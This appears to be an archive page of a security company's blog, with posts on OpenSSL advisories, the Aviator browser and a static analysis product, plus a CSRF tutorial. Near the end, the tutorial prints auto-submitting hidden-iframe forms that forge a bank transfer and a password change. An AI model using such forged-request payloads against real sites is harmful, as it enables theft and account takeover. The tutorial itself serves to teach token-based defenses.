Tag Archives: application security

SSL/TLS MITM vulnerability CVE-2014-0224

We are aware of the OpenSSL advisory posted at https://www.openssl.org/news/secadv_20140605.txt. OpenSSL is vulnerable to a ChangeCipherSpec (CCS) Injection Vulnerability.

An attacker using a carefully crafted handshake can force the use of weak keying material in OpenSSL SSL/TLS clients and servers.

The attack can only be performed between a vulnerable client *and* a vulnerable server. Desktop Web browser clients (e.g. Firefox, Chrome, Internet Explorer) and most mobile browsers (e.g. Safari mobile, Firefox mobile) are not vulnerable, because they do not use OpenSSL. Chrome on Android does use OpenSSL and may be vulnerable. All other OpenSSL clients are vulnerable in all versions of OpenSSL.

Servers are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.

OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za.
OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m.
OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h.
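
As a rough illustration of the table above, checking a deployment reduces to comparing a version banner’s letter suffix against the first patched release on its branch (OpenSSL letter suffixes sort lexicographically, with “za” following “z”). A sketch in Python; the banner format is assumed to be the usual “OpenSSL x.y.z<letters>” string:

```python
import re

# First patched letter release per affected branch, per the advisory.
PATCHED = {"0.9.8": "za", "1.0.0": "m", "1.0.1": "h"}

def is_patched(banner):
    """True/False for known branches; None when the branch isn't in the table."""
    m = re.match(r"OpenSSL (\d+\.\d+\.\d+)([a-z]*)", banner)
    if not m:
        return None
    branch, letters = m.groups()
    if branch not in PATCHED:
        return None
    # Letter suffixes compare correctly as plain strings: "g" < "h" < "za".
    return letters >= PATCHED[branch]
```

Branches outside the table (such as 1.0.2-beta1) return None here; consult the advisory directly for those.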

WhiteHat is actively working on implementing a check for sites under service. We will update this blog with additional information as it is available.

Editor’s note:
June 6, 2014
WhiteHat has added testing to identify websites currently running affected versions of OpenSSL across all of our DAST service lines. These vulnerabilities will open as “Insufficient Transport Layer Protection” in the Sentinel interface. WhiteHat recommends that all assets, including non-web application servers and sites that are currently not under service with WhiteHat, be tested and patched.

If you have any questions regarding the new CCS Injection SSL vulnerability please email support@whitehatsec.com and a representative will be happy to assist.

Podcast: An Anthropologist’s Approach to Application Security

In this edition of the WhiteHat Security podcast, I talk with Walt Williams, Senior Security and Compliance Manager at Lattice Engines. Hear how Walt went from anthropologist to security engineer, his approach to building relationships with developers, and why his biggest security surprise involved broken windshields.

Want to do a podcast with us? Sign up to become an “Unsung Hero”.

About our “Unsung Hero Program”
Every day, app sec professionals tirelessly protect the Web, and we recognize that this is largely owed to a series of small victories. These represent untold stories. We want to help share your story. To learn more click here.

Heartbleed OpenSSL Vulnerability

Monday afternoon a flaw in the way OpenSSL handles the TLS heartbeat extension was revealed and nicknamed “The Heartbleed Bug.” According to the OpenSSL Security Advisory, “a missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.” The flaw creates an opening in SSL/TLS which an attacker could use to obtain private keys, usernames/passwords, and content.
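
At its core, the bug is a length field that was trusted without validation. This toy Python sketch is purely illustrative (Python slicing cannot overread memory the way the vulnerable C code could); it only shows the shape of the missing check:

```python
def echo_heartbeat(payload: bytes, claimed_len: int) -> bytes:
    """Toy model of a TLS heartbeat echo (illustrative, not OpenSSL's code).

    The vulnerable C code copied `claimed_len` bytes starting at the payload,
    reading past its end into adjacent process memory. The fix is the bounds
    check below: discard records whose claimed length exceeds the data
    actually received (here we raise to make the rejection visible).
    """
    if claimed_len > len(payload):  # the check that was missing
        raise ValueError("heartbeat length exceeds received payload")
    return payload[:claimed_len]   # echo exactly what was sent, no more
```

With the check in place, a malicious heartbeat that declares 64 KB against a 4-byte payload is rejected instead of echoing neighboring memory.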

OpenSSL versions 1.0.1 through 1.0.1f as well as 1.0.2-beta1 are affected. The recommended fix is to upgrade to 1.0.1g and to reissue certificates for any sites that were using compromised OpenSSL versions.

WhiteHat has added testing to identify websites currently running affected versions. These vulnerabilities will open as “Insufficient Transport Layer Protection” in the Sentinel interface. These tests are currently being run across all of our clients’ applications, and we expect full coverage of all applications under service within the next two days. WhiteHat also recommends that all assets, including non-web application servers and sites that are currently not under service with WhiteHat, be tested. Several tools have been made available to test for the issue: an online testing tool at http://filippo.io/Heartbleed/, another tool on GitHub at https://github.com/titanous/heartbleeder, and a new script at http://seclists.org/nmap-dev/2014/q2/36

If you have any questions regarding the Heartbleed Bug please email support@whitehatsec.com and a representative will be happy to assist.

OpenSSL Security Advisory: https://www.openssl.org/news/secadv_20140407.txt
Reference for the TLS Heartbeat extension: https://tools.ietf.org/html/rfc6520

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator utilizes open source software via Chromium; don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what would be required when Aviator became publicly available.

Chromium, from which Aviator is derived, contains a wide variety of OSS licenses, as can be seen using aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, if and when we make a change to GPL or similarly licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive, and requests for Windows, Linux, and even open source versions are pouring in, so we are definitely determining where to focus our resources and what should come next, but there is no definite timeframe yet for when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both myself and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. A browser we feel confident using not only for our own security and privacy, but one we can confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Pop-up blockers used to work wonders, but advertisers switched to sourcing in JavaScript and putting content directly on the page. They no longer have to create a new window because they can take over the entire page. With Aviator, the user’s browser doesn’t even make a connection to an advertising network’s servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a beta through the Mac App Store. Browsers try to take advantage of the fastest rendering methods they can, and some of those rely on APIs the OS does not officially support, known as “private APIs.” Apple does not support these APIs because they may change, and Apple doesn’t want to be held accountable when things break. As a result, while Apple allows applications to use these undocumented, high-speed private APIs, it doesn’t allow applications that use them to be distributed through the Mac App Store. We can speculate that the reason is that users are likely to blame Apple rather than the application when things break. So after about a month of wrestling with the issue, we decided that, for now, we’d skip the Mac App Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared ones, so this was an oversight: there was no need to hide data from one another, and chmod permissions were left too lax as source files were copied and edited. This wouldn’t have been an issue if the permissions had been changed back to a less permissive state, but that was missed. We will fix it in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute: first you say, “if you aren’t paying you are the product,” then you offer a free browser?

Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do; Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the meantime, we’re mostly interested in offering a browser that security- and privacy-conscious people want to use.

Have you gotten any feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some feedback from various employees of those vendors shared informally over Twitter. Some feedback has been positive, some negative. In either case, we’re most interested in serving the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market share leading browsers cannot do this adequately. This is an everyday threat to personal security and privacy for the more than one billion people online, which includes us. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem that the rest of the industry had: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users — by default. Over the years a great many people — friends, family members, and colleagues alike — have asked us what browser we recommend, even asked us what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but can be broadly categorized in two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent updates, and plug-in click-to-play. Well-known browser vendors have done a great job in this regard and should be commended. No one wins when users’ desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because the BSD license of Chromium allows us, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn what exactly the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations where websites may store cookie and cookie-like data in a browser. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. As a side effect, Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the number of session states you have open, due to an intentional lack of persistence in the browser across sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks connections to intranet IP addresses (RFC 1918).
    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network — IP addresses that could not otherwise be reached from the outside (NAT). Exploitation may lead to simple reconnaissance of internal networks, or it may permanently compromise your network by overwriting the firmware on the router. Without installing special third-party software, it’s impossible to block Web code from carrying out browser-based intranet hacking. If Aviator happens to be blocking something you want to reach, Connection Control allows you to create custom rules — or temporarily use another browser.
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, etc. And of course the visuals in the ads themselves are often distasteful, offensive, or inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome Web Store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund their content. They must also understand that many who use ad-blocking software aren’t necessarily anti-advertising, but rather pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see, which Disconnect’s icon makes easy to do with a couple of mouse clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well known that Google search makes the company billions of dollars annually via user advertising and tracking / profiling. DuckDuckGo promises exactly the opposite: “Search anonymously. Find instantly.” We felt that was a much better default option. Of course, if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When clicking from one link to the next, browsers tell the destination website where the click came from via the Referer header (the misspelling is historical and intentional). The referring URL can leak sensitive information such as search keywords, internal IPs/hostnames, session tokens, etc., and sending it cross-domain offers little, if any, benefit to the user. Aviator therefore only sends the Referer header within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Plug-ins are click-to-play by default.

    Plug-ins (e.g. Flash and Java) are a source of tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection: your browser might be secure, but the plug-ins are not, and they must be updated constantly. Then of course there are all the annoying sounds and visuals made by plug-ins, which are difficult to identify and block once they load. So we blocked them all by default. When you want to run a plug-in, say on YouTube, just click once on the puzzle piece. If you want a website to always load its plug-ins, that’s a configuration change as well: “Always allow plug-ins on…”
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / log in to Google, and the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we have defaulted to DuckDuckGo as the search engine, we have limited what the browser sends to Google to protect your privacy. If you choose to use Google services, that is your choice. If you choose not to, though, it can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we would prefer “Can-Not-Track” to “Do-Not-Track,” we figured it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.
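The RFC 1918 check behind Connection Control (difference 2 above) can be sketched in a few lines of Python using only the standard library. This is an illustrative sketch, not Aviator’s actual implementation, which has not been published:

```python
import ipaddress

# The three private IPv4 ranges defined by RFC 1918.
RFC1918_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

def is_rfc1918(host_ip: str) -> bool:
    """True if the address falls in a private RFC 1918 range."""
    ip = ipaddress.ip_address(host_ip)
    return ip.version == 4 and any(ip in net for net in RFC1918_NETS)
```

A default-deny rule would refuse any connection for which `is_rfc1918` returns True unless the user has added an explicit exception.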

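Likewise, the same-domain Referer policy (difference 6 above) amounts to comparing two hostnames before the header is attached. A minimal sketch, assuming an exact-host match (the real rule may instead compare registrable domains):

```python
from urllib.parse import urlparse

def referer_for(request_url: str, referring_url: str):
    """Return the Referer value to send with a request, or None to omit it."""
    same_host = (
        urlparse(request_url).hostname == urlparse(referring_url).hostname
    )
    return referring_url if same_host else None
```
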
We have appreciated the response to WhiteHat Aviator so far and welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us. Download it, give it a test run, and let us know what you think! Click here to learn more about the Aviator browser.

20,000

20,000. That’s the number of websites we’ve assessed for vulnerabilities with WhiteHat Sentinel. Just saying that number alone really doesn’t do it any justice though. The milestone doesn’t capture the gravity and importance of the accomplishment, nor does it fully articulate everything that goes into that number, and what it took to get here. As I reflect on 20,000 websites, I think back to the very early days when so many people told us our model could never work, that we’d never see 1,000 sites, let alone 20x that number. (By the way, I remember their names distinctly ;).) In fairness, what they couldn’t fully appreciate then was what it really takes to scale “Web security”; which means they truly didn’t understand “Web security.”

When WhiteHat Security first started back in late 2001, consultants dominated the vulnerability assessment space. If a website was [legally] tested for vulnerabilities, it was done by an independent third party. A consultant would spend roughly a week per website, scanning, prodding around, modifying cookies, URLs and hidden form fields, and then finally deliver a stylized PDF report documenting their findings (aka “the annual assessment”). A fully billed consultant might be able to comprehensively test 40 individual websites per year, and the largest firms might have as many as 50 consultants. So collectively, the entire company could only get to about 2,000 websites annually. That is FAR shy of just the 1.8 million SSL-serving sites on the Web. This exposed an unacceptable limitation of the consulting business model.

WhiteHat, at the time of this writing, handles 10x the workload of any consulting firm we’re aware of, and we’re nowhere near capacity. Not only that, WhiteHat Sentinel is assessing these 20,000 websites on a roughly weekly basis, not just once a year! That’s orders of magnitude more security value delivered than what one-time assessments can possibly provide. Remember, the Web is a REALLY big place, like 700 million websites big in total. And that right there is what Web security is all about: scale. If a solution is unable to scale, it’s not a Web security solution. It’s a one-off. It might be a perfectly acceptable one-off, but a one-off nonetheless.

Achieving scalability in Web security must take into account the holy trinity, a symbiotic combination of People, Process, and Technology – in that order. No [scalable] Web security solution I’m aware of can exist without all three. Not developer training, not threat modeling, not security in QA, not Web application firewalls, not centralized security controls, and certainly not vulnerability assessment. Nothing. No technological innovation can replace the need for the other two factors. The best we can expect of technology is to increase the efficiency of people and processes. We’ve understood this at WhiteHat Security since day one, and it’s one of the biggest reasons WhiteHat Security continues to grow and be successful where many others have gone by the wayside.

Over the years, while the vulnerabilities themselves have not really changed much, Web security culture definitely has. As the industry matures and grows, and awareness builds, we see the average level of Web security competency decrease! This is something to be expected. The industry is no longer dominated by a small circle of “elites.” Today, most in this field are beginners, with 0 – 3 years of work experience, and this is a very good sign.

That said, there is still a huge skill and talent debt everyone must be mindful of. So the question is: in the labor force ecosystem, who is in the best position to hire, train, and retain Web security talent – particularly the Breaker (vulnerability finders) variety – security vendors or enterprises? Since vulnerability assessment is not and should not be in most enterprises’ core competency, AND the market is highly competitive for talent, we believe the clear answer is the former. This is why we’ve invested so greatly in our Threat Research Center (TRC) – our very own professional Web hacker army.

We started building our TRC more than a decade ago, recruiting and training some of the best and brightest minds, many of whom have now joined the ranks of the Web security elite. We pride ourselves on offering our customers not only a very powerful and scalable solution, but also an “army of hackers” – more than 100 strong and growing – that is at the ready, 24×7, to hack them first. “Hack Yourself First” is a motto that we share proudly, so our customers can be made aware of the vulnerabilities that exist on their sites and can fix them before the bad guys exploit them.

That is why crossing the threshold of 20,000 websites under management is so impressive. We have the opportunity to assess all these websites in production – as they are constantly updating and changing – on a continuous basis. This arms our team of security researchers with the latest vulnerability data for testing and measuring and ultimately protecting our customers.

Other vendors could spend millions of dollars building the next great technology over the next 18 months, but they cannot build an army of hackers in 18 months; it just cannot be done. Our research and development department is constantly working on ways to improve our methods of finding vulnerabilities, whether with our scanner or by understanding business logic vulnerabilities. They’re also constantly updated with new 0-days and other vulnerabilities that we try to incorporate into our testing. These are skills that take time to cultivate and strengthen and we have taken years to do just that.

So, I have to wonder: what will 200,000 websites under management look like? It’s hard to know, really. We had no idea 10+ years ago what getting to 20,000 would look like, and we certainly never would have guessed that it would mean processing more than 7TB of data per week over millions of dollars of infrastructure. That said, given the speed at which the Internet is growing and the speed at which we are growing with it, we could reach 200,000 sites in the next 18 months. And that is a very exciting possibility.

WhiteHat Sentinel Source is Born!

June 1st 2012 was the official one-year mark since WhiteHat Security and Infrared Security decided to join forces to create WhiteHat Sentinel Source. After a significant amount of hard work from a lot of great people, WhiteHat Sentinel Source has gone public! I’m going to use this opportunity to write up a bit of a nostalgic blog post… while still keeping my Don Draper game face on of course. Having been an application security consultant for years, I’ve developed a pretty big chip on my shoulder as it relates to existing static analysis tools. I said to myself time and time again… “There has to be a better way to do this!” I put that energy to good use and infused our technology and service offering with the following core static analysis values that truly separate WhiteHat Sentinel Source from the competition:

1. Invest in Performance:

In order to support an Agile-paced development world, performance of both scan time and verification turnaround time are critical to success. We are constantly investing in our core technology and processes to ensure we get the fastest turnaround time possible!

2. Support Modern Programming Paradigms:

Development teams have adopted various modern programming paradigms and technologies that throw existing static analysis tools for a loop. Such paradigms and patterns include: Object-Oriented Programming, Aspect-Oriented Programming, Inversion of Control, Dependency Injection, etc. We are constantly striving to ensure that our technology has the ability to support these paradigms to accurately model modern source code!

3. Strive for Actionable Results:

Reviewing 100+ “findings” is a complete burden and dilutes the value of the technology. We are striving for quality over quantity throughout our core engine and RulePack development processes! “No grep-like rules” is something you’ll hear me say frequently.

4. Provide Feedback Early:

Performing source code scans at the end of a development initiative, or only once the project distributable can be built, is too late! Teams are constantly requesting feedback during the development phases, not at the end. We are constantly striving to ensure our ability to integrate with source code repositories so that we can provide feedback early in the development phase. This, coupled with our core technology performance, makes daily scans a possibility!

5. Leave Security to Security:

Putting a large static analysis report in front of a developer expecting them to triage and fix the results is a complete waste of time and energy. We are constantly striving to ensure that we enable developers to more effectively remediate significant vulnerabilities by performing the triage ourselves.

While the success of WhiteHat Sentinel Source is attributable to many individuals, there are a few folks who really stand out:

Jerry Hoff (VP, Static Analysis Division):

Jerry is an incredibly well-rounded application security expert and a long-time friend. Jerry played a critical role in disseminating our static analysis strategy to the rest of the team and really bootstrapped our ability to talk about static analysis in a way that actually makes sense to people. I always thought I had a great ability to make application security topics digestible until I met this guy. Very much a forward-thinking person, I refuse to have strategic discussions without his input. Jerry has been helping me push static analysis since day 1 at Infrared Security, and now at WhiteHat. We would not have gotten even half this far without his efforts… thank you Jerry!

Siamak Pazirandeh (Senior Software Architect):

Siamak is an incredibly talented developer, architect, and leader. The benevolent development dictator, Siamak (a.k.a. Max) was responsible for spearheading the integration of static analysis into WhiteHat’s existing DAST service model. This large effort involved designing and building a persistency model for evolving codebases optimized for the purpose of verification, scalability design, service delivery architecture, middleware integration, and overall project leadership. He’s already solved challenges with DAST; why not solve SAST too… thank you Max!

John Melton (Senior Application Security Researcher):

John too is an incredibly well-rounded application security expert with serious technical depth in Java. With his astounding work ethic, attention to detail, and everlasting pursuit of perfection, John Melton has become the lead of the Sentinel Source Java engine and RulePack R&D. His abilities and core values around product development provide me with the confidence I need so that I can focus energies on other development initiatives. He is also one of fewer than five people in the world who can very directly and bluntly call me out on my mistakes without me feeling insulted. I think it has to do with his southern accent… thank you John!

With the core technology in place and our integration with the Sentinel interface, WhiteHat Sentinel Source is ready! We fully intend to shake up this market and will continue to push forward with real innovation. We pledge to strive for accuracy, timeliness, and usability in our solution. We look forward to other vendors stepping up to the plate… competition will only make us work harder!

My First CSRF

My First Cross-Site Request Forgery Experience

A while back I was sifting through the posts of my friends on one of today’s popular social networking sites when I saw an odd video called “baby elephant giving birth” – or something to that effect – posted by several of my friends. This tingled my security-spidey senses. I knew something wasn’t legit, but I didn’t know exactly what. I decided to get on an old desktop I rarely use to check it out.

This is what happened: I clicked the link and was warned that I was leaving the safety of socialnetworksite.com. The video opened in a new tab and began to play. I closed the tab, returned to my profile, and saw that I had now posted “baby elephant giving birth” for all of my friends to see. I was a victim of CSRF.

How This Happened

When I originally logged into socialnetworksite.com, it stored my authenticated session within a cookie, and from then on the site used that cookie to verify that I was authorized. When I left socialnetworksite.com and loaded the new page, evilsite.example.com, a script embedded in that page executed on load. The script sent a POST request to socialnetworksite.com that posted the baby elephant video to my profile. Because the POST request came from my browser, the server checked my browser’s cookies to confirm that I was authorized to make that request, and I was.
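In server-side pseudocode, the vulnerable pattern looks roughly like this. The handler and session table are hypothetical, not from any real site, but the logic is typical: authentication rests solely on the session cookie, which the browser attaches automatically to every request to the site, so the server cannot tell a legitimate form submission from a forged one.

```python
# Minimal sketch of a CSRF-vulnerable handler (hypothetical names).
# The browser sends the session cookie with every request to the site,
# including requests triggered by a page on evilsite.example.com.
SESSIONS = {"htg1assvnhfegbsnafgd9ie9m1": "JoeS"}  # session id -> user

def handle_post(cookies: dict, form: dict) -> str:
    session_id = cookies.get("PHPSESSID")
    user = SESSIONS.get(session_id)
    if user is None:
        return "403 not logged in"
    # No CSRF token check: any request carrying a valid session cookie
    # is accepted, regardless of which page initiated it.
    return f"200 posted '{form.get('post')}' to {user}'s profile"

# A forged cross-site request succeeds because the cookie rides along:
forged = handle_post({"PHPSESSID": "htg1assvnhfegbsnafgd9ie9m1"},
                     {"post": "baby elephant giving birth"})
```

The point of the sketch is what is missing: nothing in the request proves it originated from a page the site itself served.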

How to Protect Against This Occurring as a Developer

The most common and effective form of CSRF protection is a randomly generated token that is assigned at the beginning of each session and expires when the session ends. You can also generate and expire a fresh CSRF token for each POST. Some sites rely on the ViewState property of ASP.NET pages, but because a ViewState simply records the input data of a form, an attacker can potentially guess what those inputs will be. Granted, a ViewState is better than no protection at all, but a randomly generated CSRF token is just as easy to implement and much more effective.
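The token scheme described above (often called the synchronizer token pattern) can be sketched in a few lines. The function names here are illustrative, not from any particular framework: the server generates an unpredictable token per session, embeds it in every form it renders, and rejects any POST whose token does not match.

```python
import hmac
import secrets

SESSION_TOKENS = {}  # session id -> CSRF token

def issue_token(session_id: str) -> str:
    """Generate an unpredictable per-session token and remember it.
    The server embeds this value in a hidden field of every form."""
    token = secrets.token_hex(32)
    SESSION_TOKENS[session_id] = token
    return token

def validate_token(session_id: str, submitted: str) -> bool:
    """Accept the POST only if the submitted token matches the session's.
    compare_digest avoids leaking the token through timing differences."""
    expected = SESSION_TOKENS.get(session_id)
    return expected is not None and hmac.compare_digest(expected, submitted)
```

A forged cross-site request fails this check because the attacker's page has no way to read the victim's token, so it cannot include the right hidden-field value in the request it auto-submits.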

Note: If the same site is also vulnerable to Cross-Site Scripting, the token is irrelevant, because the attacker can use injected script to read the token out of the page and make whatever authenticated requests he chooses.

How to Avoid This Occurring as a User

Never click on untrusted or unfamiliar links. Access any sensitive websites (your email, banking accounts, etc.) in their own browser, kept separate from any other Web surfing.

For a description of how WhiteHat Security detects CSRF, check out Arian Evans’ blog at https://blog.whitehatsec.com/tag/csrf/.

So even though my example of CSRF was relatively harmless, the attack could just as easily have been directed at a banking website to transfer money. Let’s say I open a link from an email while I have an active session at “bigbank.com”.

For transferring money, bigbank.com may have a form that looks something like this on its website:

<form name="legitForm" action="/transfer.php" method="POST">
<b>From account:</b> <input name="transferFrom" value="" type="text">
<br>To account: <input name="transferTo" value="" type="text">

<br>Amount: <input name="amount" value="" type="text">
<span><input name="transfer" value="Transfer" type="submit"></span>

</form>

When you fill out and submit the legitForm, the browser sends a POST request to the server that looks something like this:

POST /transfer.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

transferFrom=111222&transferTo=111333&amount=1.00&transfer=Transfer

Neither of the previous snippets matters to the user, but they DO give the attacker the structure he needs to build his own malicious POST request containing his account information. The attacker embeds the following code in the website you clicked through to:

<iframe style="visibility: hidden" name="invisibleFrame">
<form name="stealMoney" action="http://bigbank.com/transfer.php" method="POST" target="invisibleFrame">
<input type="hidden" name="transferFrom" value=""> <!-- ← Problem? -->
<input type="hidden" name="transferTo" value="555666">
<input type="hidden" name="amount" value="1000000.00">
<input type="hidden" name="transfer" value="Transfer">
</form>
<script>document.stealMoney.submit();</script>
</iframe>

This code automatically builds and sends the POST request as soon as the page loads. Not only does it require no user action beyond loading the page, there is also no indication to the user that a request was ever sent.

Now here’s another example, this time using a “change password” request. Again, let’s say I open a link from an email while I have an active session at “bigbank.com”. Most likely, bigbank.com’s website has a “Change User’s Password” form that looks something like this:

<form name="changePass" action="/changePassword.php" method="POST">
<b>New Password:</b> <input name="newPass" value="" type="text">
<br>Confirm Password: <input name="confirmPass" value="" type="text">

<span><input name="passChange" value="Change" type="submit"></span>

</form>

When you fill out and submit the changePass form, the browser sends the server a POST request similar to this:

POST /changePassword.php HTTP/1.1
Host: bigbank.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Cookie: PHPSESSID=htg1assvnhfegbsnafgd9ie9m1; username=JoeS; minshare=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

newPass=iloveyou&confirmPass=iloveyou&passChange=Change

Again, while neither of the previous snippets matters to the user, they DO give the attacker the structure he needs to build his own malicious POST request containing the values he wants to submit. The attacker embeds the following code in his website; when the page loads, the code executes:

<iframe style="visibility: hidden" name="invisibleFrame">
<form name="makePassword" action="http://bigbank.com/changePassword.php" method="POST" target="invisibleFrame">
<input type="hidden" name="newPass" value="Stolen!">
<input type="hidden" name="confirmPass" value="Stolen!">
<input type="hidden" name="passChange" value="Change">
</form>
<script>document.makePassword.submit();</script>
</iframe>

